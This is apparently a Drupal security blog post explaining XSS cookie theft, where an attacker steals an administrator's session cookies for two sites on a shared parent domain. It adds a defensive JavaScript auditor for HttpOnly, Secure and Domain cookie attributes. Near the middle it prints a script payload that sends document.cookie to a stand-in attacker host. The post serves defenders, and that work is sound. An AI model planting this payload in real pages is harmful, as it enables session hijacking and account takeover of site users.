Using XSS to steal access
We've talked about Cross Site Scripting (XSS) before, and for good reason: it's a risk far too many sites are vulnerable to. XSS is scary because it runs in the context of the trusted relationship between your browser and a website; XSS can do everything you can do.
XSS cookie theft
Let's look at another example of an XSS exploit: stealing administrative access to a site.
- The administrator's browser will send the cookie to the attacker's website
- The attacker will use the stolen cookie to use the administrator's access on the site
Hijacking a cookie is a big deal, but this demo takes it one step further. Because the administrator will also be logged in to another site on the same domain, the attacker will receive that cookie as well. It's a two-for-one hack! Please watch this 5 minute video:
The exploit vector in the video is not standard. The community site was running Open Atrium, which uses Markdown as the default Input Format and is not vulnerable to XSS. For demonstration purposes I granted Full HTML to authenticated users, which is an insecure practice. Always be aware of what functionality you've granted to untrusted users.
<script> new Image().src = 'http://evil.example.org/steal.php?cookies=' + encodeURI(document.cookie); </script>
The unique thing about the demo is that, because the administrator was logged into two sites on the same domain, the attacker's XSS stole both cookies, allowing the attacker to gain access to a site they (potentially) could not otherwise have hacked.
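Two cookie attributes decide how much the payload above can steal: HttpOnly (a cookie without it is readable through document.cookie) and Domain (a cookie scoped to a parent domain is sent to every sibling host, which is what produced the two-for-one). The following audit is an added example, not code from the post or from Open Atrium; the hostnames and cookie names are constructed.

```javascript
// Added example: audit Set-Cookie headers for the attributes that limit XSS cookie theft.
// Hostnames and cookie names are constructed for illustration.

function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1),
                   httpOnly: false, secure: false, domain: null };
  for (const attr of attrs) {
    const [k, v] = attr.split('=');
    const key = k.toLowerCase();
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    // A leading dot is legacy syntax; normalise so "Domain=.example.org" reads as example.org.
    else if (key === 'domain' && v) cookie.domain = v.replace(/^\./, '').toLowerCase();
  }
  return cookie;
}

// Findings for one Set-Cookie header issued by siteHost (empty array means hardened).
function auditCookie(header, siteHost) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.httpOnly) findings.push(`${c.name}: readable via document.cookie (missing HttpOnly)`);
  if (!c.secure) findings.push(`${c.name}: sent over plain HTTP (missing Secure)`);
  // A Domain attribute that is a parent of the issuing host shares the cookie with sibling sites.
  if (c.domain && c.domain !== siteHost.toLowerCase()) {
    findings.push(`${c.name}: shared with every host under ${c.domain} (broad Domain)`);
  }
  return findings;
}

// Names an injected script would see in document.cookie: only cookies lacking HttpOnly.
function visibleToScript(headers) {
  return headers.map(parseSetCookie).filter(c => !c.httpOnly).map(c => c.name);
}

// Constructed samples: the weak configuration (two sites sharing a parent Domain,
// no HttpOnly) beside a hardened one scoped to the single host.
const weakCookies = [
  'SESSa1b2=abc123; Path=/; Domain=.example.org',
  'SESSc3d4=def456; Path=/; Domain=.example.org',
];
const hardenedCookies = [
  'SESSa1b2=abc123; Path=/; Domain=community.example.org; Secure; HttpOnly',
];
```

With the weak set, visibleToScript returns both session cookie names, which is exactly what the payload exfiltrates; with the hardened set it returns nothing and auditCookie reports no findings.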
The likelihood of an attack of this type being successful is questionable, but the risk should be considered. XSS vulnerabilities are extremely common in web applications, so you should audit your configuration and custom code for adherence to Drupal best practices.